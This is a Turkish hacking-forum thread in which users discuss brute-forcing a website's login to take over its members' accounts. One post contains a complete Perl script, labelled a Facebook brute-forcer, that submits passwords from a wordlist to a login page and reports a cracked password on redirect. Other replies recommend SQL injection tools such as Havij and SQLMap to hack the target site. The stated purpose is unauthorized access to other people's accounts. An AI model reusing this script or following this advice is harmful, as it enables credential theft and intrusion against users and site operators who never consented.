Brute force

Regnos

Katılımcı Üye
5 Haz 2016
622
1
Tabiki site ekleme yerine hedef siteyi ekleyip admin ve pass larınızı ekleyip brute force başlatın eğer verdiğiniz admin veya pass'lardan biri eşleşirse bulur.

ZANLI11

Yeni üye
6 Haz 2016
50
0
selam kardes bu kodlarla yapıyorum olmuyorum facebook değil çok sık deniyorsun demeyen bi siteye deniyorum ilk once deneme amaçlı kendi e postamı ve şifremi yazıyorum onu bile bulmuyor Kod
#!/usr/bin/perl

# Facebook Brute Perl Version C0ded bY Mauritania Attacker
# Gr33tz To All AnonGhost Memberz \!/

use LWP::UserAgent;

$site = $ARGV[0];
$id = $ARGV[1];
$wordl = $ARGV[2];

if(@ARGV != 3){
print "
Facebook Brute Perl Version C0ded bY Mauritania Attacker

How to use: $0 <site> <ID> <wordlist>
Example: $0 m.facebook.com ID wordlist.txt

";
exit;
}

if ($site !~ /^http:\/\//){
$site = 'http://' . $site;
}
if ($site !~ /\/login.php/){
$site = $site . '/login.php';
}

open(a,"<$wordl") or die "$!";
print "\n\nSite: $site\nUsername: $id\n\nAttacking...\n\n";
sleep(2);
while(<a>){
chomp($_);

my $ua = new LWP::UserAgent;

my $response
= $ua->post($site,
{ email => $id,
pass => $_,
login => 'login',
});

my $code = $response->code;
print "[+] Testing... $_\n";
if($code == 302){
print "\n\n\t[*] PASSWORD CRACKED: $_\n\n";
exit;
}
}
exit;

HyBRiSSS

Katılımcı Üye
2 Nis 2016
651
0
Hedef Siteyi,Hacklemek İçin ''Brute Force'' İle Değil'de ;

''Safe 3,Havij'' Programları İle Sitenin Açığını Bularak Hacklemenizi,Öneriyorum.

İyi Forumlar...

ZANLI11

Yeni üye
6 Haz 2016
50
0
Siteyi hacklersen onlara zaten erişimin olucak. Sql biliyorsan Havik,SqlMap,Safe 3 bunları denersen sonuç elde edersin.

kardesım ben onların hepsını bılıyorum sıtede hıçbı açık yok ben o yuzden uyelerını almak istiyorum nasıl sırf siteye login kısmını ekleyerek ve wordlıstı ekleyerek nasıl tum şifreleri denetebilirim ?

Regnos

Katılımcı Üye
5 Haz 2016
622
1
kardesım ben onların hepsını bılıyorum sıtede hıçbı açık yok ben o yuzden uyelerını almak istiyorum nasıl sırf siteye login kısmını ekleyerek ve wordlıstı ekleyerek nasıl tum şifreleri denetebilirim ?

Bunun için eklentiler vardı deneme yanılma yöntemi gibi birşey isimleri aklımda değil bir arkadaş ismini yazabilir mi?

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.